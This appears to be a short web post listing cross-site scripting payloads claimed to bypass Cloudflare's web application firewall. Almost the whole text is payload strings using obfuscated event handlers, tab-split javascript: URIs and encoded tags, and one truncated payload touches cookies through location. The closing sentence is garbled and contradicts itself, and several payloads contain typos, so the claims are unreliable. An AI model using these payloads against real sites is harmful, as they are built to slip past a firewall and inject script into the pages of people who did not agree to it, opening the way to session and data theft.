Here is the list of XSS Payloads to Bypass CloudFlare Firewall
Method 1
Cloudflare #WAF Bypass
Cloudflare #WAF Bypass
Just use {alert`1`} instead of alert(1).
Any #XSS vector will work
(except <script>).
Method 2
- <img src onerror=%26emsp;prompt`${document.domain}`>
- <--`<img/src=` onerror=confirm``> --!>
- “><svg/on</script>laod=alert>
- <a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
- <svg%0Aonauxclick=0;[1].some(confirm)//
- <a"/onclick=(confirm)()>Click Here!
- xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
- .</Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt>
- {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
- `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E
- %27;%0d%0d});%0d{onerror=prompt}throw document.location</ScRipT//
- <a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
- XSS using location with cookie value payload : %3Cp%20style=overflow:auto;font-size:999px%20onscroll=x=location=%27
- <a"/onmouseover=(confirm)('clodflare-bypass-doskey_history')>click
- "/><frostnull+onmousemove/=alert`xss`+"<">frostnull<!--
CloudFlare is bypass i have check the all payload but cont bypass it